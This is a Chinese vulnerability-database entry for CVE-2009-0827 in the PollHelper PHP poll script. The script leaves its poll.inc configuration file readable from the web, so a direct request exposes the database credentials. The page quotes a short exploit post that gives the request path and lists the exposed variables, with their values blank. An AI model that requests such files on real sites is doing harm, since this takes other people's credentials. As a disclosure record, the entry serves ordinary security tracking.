Freedville Andrew Freed PollHelper 'poll.inc'权限许可和访问控制漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117199 漏洞类型 权限许可和访问控制
发布时间 2009-01-06 更新时间 2009-03-05
CVE编号 CVE-2009-0827 CNNVD-ID CNNVD-200903-104
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/7690
https://www.securityfocus.com/bid/79554
https://cxsecurity.com/issue/WLB-2009030127
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-104
|漏洞详情
PollHelper是一款在网站内构建投票调查系统的工具PHP脚本。在根目录下poll.inc,但没有赋予足够的访问控制,这会允许远程攻击者可以借助提交一个直接的请求,下载包含用户凭证的数据库文件。
|漏洞EXP
Remote Config File Disclosure
----------------------------------------------------
script: PollHelper
   
***************************************************************************
download from:http://www.freedville.com/oss/PollHelper.zip
   
***************************************************************************
vul:

www.site.com/path/poll.inc
...............................
  $dbhost = "";
  $dbusername = "";
  $dbuserpass = "";
  $default_dbname = ";
..............................
-------------------------------------------------
-------------------------------------------------  
*************************************************

Author: ahmadbady 

*************************************************

# milw0rm.com [2009-01-06]
|受影响的产品
Freedville Pollhelper -
|参考资料

来源:XF
名称:pollhelper-poll-info-disclosure(47797)
链接:http://xforce.iss.net/xforce/xfdb/47797
来源:MILW0RM
名称:7690
链接:http://www.milw0rm.com/exploits/7690
来源:SECUNIA
名称:33378
链接:http://secunia.com/advisories/33378
来源:OSVDB
名称:51185
链接:http://osvdb.org/51185